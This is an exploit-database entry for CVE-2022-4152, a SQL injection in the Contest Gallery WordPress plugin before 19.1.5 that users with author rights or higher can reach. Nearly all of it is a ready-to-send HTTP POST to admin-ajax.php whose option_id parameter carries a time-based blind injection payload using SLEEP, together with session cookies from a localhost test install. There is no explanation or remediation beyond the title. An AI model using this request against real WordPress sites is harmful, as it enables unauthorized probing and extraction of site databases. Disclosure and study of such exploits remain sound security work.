Exploit for Contest Gallery < 19.1.5 - Author+ SQL Injection CVE-2022-4152

Name: Exploit for Contest Gallery < 19.1.5 - Author+ SQL Injection CVE-2022-4152
Rating: 5 (62 reviews)

2022-12-05 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:4B058966-0859-42ED-A796-B6C6CB08A9FC
POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_options=true&option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(2*3)))UrUZ) HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20111157931082033094578071609
Content-Length: 355
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668486148%7Ciue1BpD8DyhKzm4LMQskkHLzsz4TbknZXcqQlgI1eeS%7C62265def59372d372b5ba459780bd8c14c8b84a253c9fc70dd3de66ae361507f; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668486148%7Ciue1BpD8DyhKzm4LMQskkHLzsz4TbknZXcqQlgI1eeS%7C69c36f6ff952f3fc1a71c3dd81a707bc4ef0760f84d7c605b77639d98644b5d5; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668313348
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------20111157931082033094578071609
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------20111157931082033094578071609
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------20111157931082033094578071609--